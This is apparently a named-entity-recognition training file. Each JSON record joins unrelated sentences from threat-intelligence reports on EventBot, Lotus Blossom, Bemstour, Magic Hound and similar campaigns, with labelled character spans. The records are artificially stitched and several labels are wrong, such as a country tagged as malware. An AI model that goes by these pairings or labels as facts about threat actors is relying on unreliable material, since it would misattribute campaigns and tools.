{"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": [{"start": 204, "end": 221, "label": "Malware"}, {"start": 258, "end": 278, "label": "Malware"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 348, "end": 361, "label": "Vulnerability"}, {"start": 385, "end": 398, "label": "Organization"}]}
{"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": [{"start": 65, "end": 75, "label": "Organization"}, {"start": 204, "end": 225, "label": "Malware"}, {"start": 274, "end": 279, "label": "System"}, {"start": 374, "end": 384, "label": "Organization"}, {"start": 388, "end": 401, "label": "Organization"}, {"start": 433, "end": 438, "label": "Malware"}, {"start": 439, "end": 446, "label": "Malware"}]}
{"text": "Use mobile threat detection solutions for enhanced security . The malicious attachments purported to be invitations or drafts of the agenda for the conference . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": [{"start": 66, "end": 87, "label": "Malware"}, {"start": 104, "end": 115, "label": "System"}, {"start": 119, "end": 139, "label": "System"}, {"start": 172, "end": 178, "label": "Organization"}, {"start": 195, "end": 205, "label": "Organization"}]}
{"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . iDefense analysts have identified a campaign likely to be targeting members of\u2014 or those with affiliation or interest in\u2014the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": [{"start": 42, "end": 62, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 128, "end": 136, "label": "Malware"}, {"start": 233, "end": 249, "label": "Malware"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 344, "end": 352, "label": "System"}, {"start": 355, "end": 363, "label": "Organization"}, {"start": 486, "end": 513, "label": "Organization"}, {"start": 516, "end": 520, "label": "Organization"}]}
{"text": "This malware appears to be newly developed with code that differs significantly from previously known Android malware . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) .", "spans": [{"start": 102, "end": 109, "label": "System"}, {"start": 125, "end": 133, "label": "Malware"}, {"start": 174, "end": 213, "label": "Malware"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 387, "end": 420, "label": "Organization"}, {"start": 423, "end": 427, "label": "Organization"}]}
{"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 171, "end": 187, "label": "Malware"}, {"start": 207, "end": 245, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 289, "end": 302, "label": "Organization"}, {"start": 305, "end": 313, "label": "Organization"}, {"start": 399, "end": 409, "label": "Organization"}, {"start": 426, "end": 439, "label": "Organization"}, {"start": 444, "end": 457, "label": "Organization"}]}
{"text": "EventBot abuses Android \u2019 s accessibility feature to access valuable user information , system information , and data stored in other applications . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 16, "end": 23, "label": "System"}, {"start": 162, "end": 174, "label": "Malware"}, {"start": 195, "end": 217, "label": "Malware"}, {"start": 244, "end": 272, "label": "Malware"}, {"start": 549, "end": 551, "label": "System"}, {"start": 615, "end": 624, "label": "Organization"}, {"start": 686, "end": 700, "label": "Vulnerability"}]}
{"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": [{"start": 16, "end": 24, "label": "Malware"}, {"start": 128, "end": 152, "label": "Organization"}, {"start": 186, "end": 207, "label": "Malware"}, {"start": 223, "end": 249, "label": "System"}, {"start": 256, "end": 262, "label": "Organization"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 382, "end": 388, "label": "Malware"}, {"start": 396, "end": 404, "label": "Malware"}]}
{"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications . The first attack started in early July with a ShimRatReporter payload . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 49, "end": 57, "label": "Malware"}, {"start": 264, "end": 279, "label": "Malware"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}]}
{"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 38, "end": 46, "label": "Malware"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 226, "end": 243, "label": "Malware"}, {"start": 324, "end": 330, "label": "System"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 405, "end": 415, "label": "Organization"}]}
{"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 233, "end": 249, "label": "Malware"}, {"start": 274, "end": 280, "label": "System"}, {"start": 307, "end": 321, "label": "Malware"}, {"start": 407, "end": 420, "label": "Organization"}, {"start": 455, "end": 465, "label": "Organization"}]}
{"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 238, "end": 248, "label": "Malware"}, {"start": 253, "end": 275, "label": "Malware"}, {"start": 299, "end": 323, "label": "Indicator"}, {"start": 340, "end": 347, "label": "Vulnerability"}, {"start": 352, "end": 359, "label": "System"}, {"start": 360, "end": 402, "label": "System"}, {"start": 403, "end": 416, "label": "Vulnerability"}, {"start": 428, "end": 441, "label": "Vulnerability"}]}
{"text": "EventBot mobile banking applications targetedApplications targeted by EventBot . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 134, "end": 143, "label": "Malware"}, {"start": 152, "end": 170, "label": "Malware"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 302, "end": 309, "label": "Vulnerability"}, {"start": 310, "end": 323, "label": "Vulnerability"}]}
{"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 64, "end": 72, "label": "Malware"}, {"start": 110, "end": 120, "label": "Malware"}, {"start": 126, "end": 144, "label": "Malware"}, {"start": 154, "end": 165, "label": "System"}, {"start": 174, "end": 190, "label": "Malware"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 240, "end": 254, "label": "Malware"}]}
{"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": [{"start": 38, "end": 46, "label": "Malware"}, {"start": 71, "end": 82, "label": "System"}, {"start": 126, "end": 134, "label": "Malware"}, {"start": 188, "end": 201, "label": "Organization"}, {"start": 225, "end": 250, "label": "Vulnerability"}, {"start": 298, "end": 325, "label": "Malware"}, {"start": 328, "end": 355, "label": "Malware"}, {"start": 358, "end": 371, "label": "Organization"}, {"start": 390, "end": 397, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}, {"start": 444, "end": 459, "label": "Malware"}]}
{"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 176, "end": 181, "label": "Malware"}, {"start": 205, "end": 235, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 292, "end": 304, "label": "Malware"}, {"start": 331, "end": 348, "label": "Organization"}, {"start": 399, "end": 407, "label": "Organization"}]}
{"text": "Icons used for EventBot masqueraded as legitimate with these icons.application . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 170, "end": 196, "label": "Malware"}, {"start": 233, "end": 248, "label": "Organization"}, {"start": 314, "end": 320, "label": "Organization"}]}
{"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 129, "end": 144, "label": "Organization"}, {"start": 213, "end": 220, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 376, "end": 383, "label": "Malware"}, {"start": 392, "end": 405, "label": "Organization"}]}
{"text": "The team has encountered different versions of the malware over time as it has rapidly evolved . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": [{"start": 129, "end": 144, "label": "Malware"}, {"start": 237, "end": 244, "label": "Organization"}, {"start": 263, "end": 283, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}]}
{"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": [{"start": 60, "end": 68, "label": "Malware"}, {"start": 163, "end": 169, "label": "Malware"}, {"start": 308, "end": 315, "label": "Organization"}, {"start": 374, "end": 389, "label": "Malware"}]}
{"text": "Each version expands the bot \u2019 s functionality and works to obfuscate the malware against analysis . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": [{"start": 104, "end": 108, "label": "Malware"}, {"start": 109, "end": 117, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]}
{"text": "In this research , we review common features of the malware and examine the improvements the threat actor made in each version . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military .", "spans": [{"start": 144, "end": 151, "label": "Malware"}, {"start": 260, "end": 268, "label": "Malware"}, {"start": 400, "end": 410, "label": "Organization"}, {"start": 414, "end": 422, "label": "Organization"}]}
{"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": [{"start": 45, "end": 53, "label": "Malware"}, {"start": 213, "end": 226, "label": "Malware"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 339, "end": 351, "label": "Malware"}]}
{"text": "READ_EXTERNAL_STORAGE - read from external storage . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": [{"start": 57, "end": 75, "label": "Malware"}, {"start": 125, "end": 140, "label": "Malware"}, {"start": 312, "end": 330, "label": "Malware"}]}
{"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": [{"start": 94, "end": 114, "label": "Malware"}, {"start": 164, "end": 187, "label": "Malware"}, {"start": 201, "end": 209, "label": "Malware"}]}
{"text": "INTERNET - open network sockets . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": [{"start": 148, "end": 155, "label": "Malware"}, {"start": 158, "end": 165, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 445, "end": 460, "label": "Malware"}]}
{"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - whitelist the app to allow it to ignore battery optimizations . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . Lotus Blossom targeted the government , higher education , and high tech companies .", "spans": [{"start": 103, "end": 114, "label": "Malware"}, {"start": 120, "end": 123, "label": "System"}, {"start": 145, "end": 152, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 193, "end": 206, "label": "Organization"}, {"start": 220, "end": 230, "label": "Organization"}, {"start": 233, "end": 249, "label": "Organization"}, {"start": 256, "end": 275, "label": "Organization"}]}
{"text": "WAKE_LOCK - prevent the processor from sleeping and dimming the screen . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": [{"start": 130, "end": 141, "label": "Malware"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 343, "end": 349, "label": "Organization"}]}
{"text": "ACCESS_NETWORK_STATE - allow the app to access information about networks . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : Exfiltration of files , ability to download and execute additional payloads , and gain remote shell access .", "spans": [{"start": 137, "end": 144, "label": "Malware"}, {"start": 149, "end": 157, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}]}
{"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": [{"start": 140, "end": 158, "label": "Malware"}, {"start": 165, "end": 184, "label": "Malware"}, {"start": 251, "end": 266, "label": "Malware"}]}
{"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": [{"start": 187, "end": 194, "label": "Malware"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 301, "end": 309, "label": "Malware"}]}
{"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": [{"start": 123, "end": 132, "label": "Organization"}, {"start": 154, "end": 157, "label": "System"}, {"start": 272, "end": 285, "label": "Malware"}]}
{"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service . We can observe that the sample is very recent , created on Thursday , July 4 While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 127, "end": 133, "label": "Malware"}, {"start": 343, "end": 355, "label": "Malware"}, {"start": 383, "end": 391, "label": "Malware"}]}
{"text": "RECEIVE_SMS - allow the application to receive text messages . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies .", "spans": [{"start": 114, "end": 129, "label": "Malware"}, {"start": 151, "end": 161, "label": "Malware"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 226, "end": 236, "label": "Organization"}, {"start": 258, "end": 274, "label": "Organization"}, {"start": 279, "end": 298, "label": "Organization"}]}
{"text": "READ_SMS - allow the application to read text messages . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": [{"start": 61, "end": 80, "label": "Malware"}, {"start": 86, "end": 96, "label": "System"}, {"start": 154, "end": 162, "label": "Malware"}]}
{"text": "EventBot permissions EventBot \u2019 s permissions as seen in the manifest file . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 21, "end": 29, "label": "Malware"}, {"start": 77, "end": 88, "label": "Malware"}, {"start": 100, "end": 112, "label": "Malware"}, {"start": 193, "end": 213, "label": "Organization"}, {"start": 220, "end": 228, "label": "Malware"}]}
{"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": [{"start": 50, "end": 58, "label": "Malware"}, {"start": 126, "end": 129, "label": "Malware"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 232, "end": 239, "label": "Malware"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 272, "end": 290, "label": "Malware"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 364, "end": 374, "label": "Organization"}, {"start": 381, "end": 399, "label": "Organization"}]}
{"text": "Initial request by EventBot Initial request by EventBot to run as a service . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": [{"start": 19, "end": 27, "label": "Malware"}, {"start": 47, "end": 55, "label": "Malware"}, {"start": 119, "end": 128, "label": "Malware"}, {"start": 139, "end": 151, "label": "Organization"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 477, "end": 490, "label": "Organization"}, {"start": 514, "end": 529, "label": "Malware"}]}
{"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows . One hour later , Bemstour was used against an educational institution in Belgium . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": [{"start": 208, "end": 216, "label": "Malware"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 430, "end": 452, "label": "Organization"}, {"start": 455, "end": 473, "label": "Organization"}, {"start": 476, "end": 501, "label": "Organization"}]}
{"text": "EventBot \u2019 s request to use accessibility services . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": [{"start": 53, "end": 61, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 115, "end": 136, "label": "System"}, {"start": 182, "end": 188, "label": "Organization"}]}
{"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher . DoublePulsar is then used to inject a secondary payload , which runs in memory only . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": [{"start": 31, "end": 38, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 143, "end": 155, "label": "Malware"}, {"start": 172, "end": 178, "label": "Malware"}, {"start": 253, "end": 266, "label": "Organization"}]}
{"text": "EventBot requests permissions to always run in the background . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 104, "end": 112, "label": "Malware"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 333, "end": 351, "label": "Organization"}]}
{"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 139, "end": 147, "label": "Malware"}, {"start": 249, "end": 257, "label": "Malware"}, {"start": 379, "end": 386, "label": "Vulnerability"}]}
{"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": [{"start": 93, "end": 101, "label": "Malware"}, {"start": 228, "end": 236, "label": "Malware"}, {"start": 304, "end": 311, "label": "Malware"}, {"start": 404, "end": 417, "label": "Organization"}]}
{"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": [{"start": 102, "end": 110, "label": "Malware"}, {"start": 155, "end": 161, "label": "System"}, {"start": 180, "end": 206, "label": "Malware"}, {"start": 209, "end": 212, "label": "Malware"}, {"start": 222, "end": 226, "label": "Malware"}]}
{"text": "The RC4 key is hardcoded in EventBot . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover .", "spans": [{"start": 28, "end": 36, "label": "Malware"}, {"start": 67, "end": 75, "label": "Malware"}, {"start": 106, "end": 111, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 180, "end": 189, "label": "System"}, {"start": 190, "end": 198, "label": "System"}, {"start": 367, "end": 386, "label": "Malware"}]}
{"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot \u2019 s configuration , which contains C2 URLs and a targeted applications list . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": [{"start": 83, "end": 91, "label": "Malware"}, {"start": 196, "end": 204, "label": "Malware"}, {"start": 213, "end": 221, "label": "Organization"}, {"start": 469, "end": 472, "label": "Malware"}]}
{"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The loader 's main goal was to run a PowerShell command to execute shellcode .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 51, "label": "Malware"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 220, "end": 238, "label": "Malware"}]}
{"text": "The configuration file contains a list of financial applications that can be targeted by EventBot . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 106, "end": 114, "label": "Organization"}, {"start": 145, "end": 154, "label": "Malware"}, {"start": 306, "end": 321, "label": "Malware"}, {"start": 322, "end": 338, "label": "System"}, {"start": 395, "end": 409, "label": "Indicator"}]}
{"text": "This version includes 185 different applications , including official applications of worldwide banks . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": [{"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 153, "end": 173, "label": "Malware"}, {"start": 178, "end": 197, "label": "Malware"}, {"start": 316, "end": 330, "label": "Malware"}, {"start": 358, "end": 375, "label": "Indicator"}]}
{"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": [{"start": 159, "end": 173, "label": "Malware"}, {"start": 187, "end": 201, "label": "Malware"}, {"start": 220, "end": 233, "label": "Malware"}, {"start": 368, "end": 374, "label": "Malware"}]}
{"text": "However , it also targets applications from Romania , Ireland , India , Austria , Switzerland , Australia , Poland and the USA . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": [{"start": 134, "end": 137, "label": "Malware"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 174, "end": 186, "label": "Malware"}, {"start": 212, "end": 219, "label": "Malware"}, {"start": 227, "end": 230, "label": "Malware"}, {"start": 246, "end": 248, "label": "Indicator"}, {"start": 257, "end": 259, "label": "System"}, {"start": 274, "end": 286, "label": "Malware"}]}
{"text": "In addition to official banking applications , the target list includes 111 other global financial applications for banking and credit card management , money transfers , and cryptocurrency wallets and exchanges . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region .", "spans": [{"start": 222, "end": 229, "label": "Malware"}, {"start": 242, "end": 253, "label": "Malware"}]}
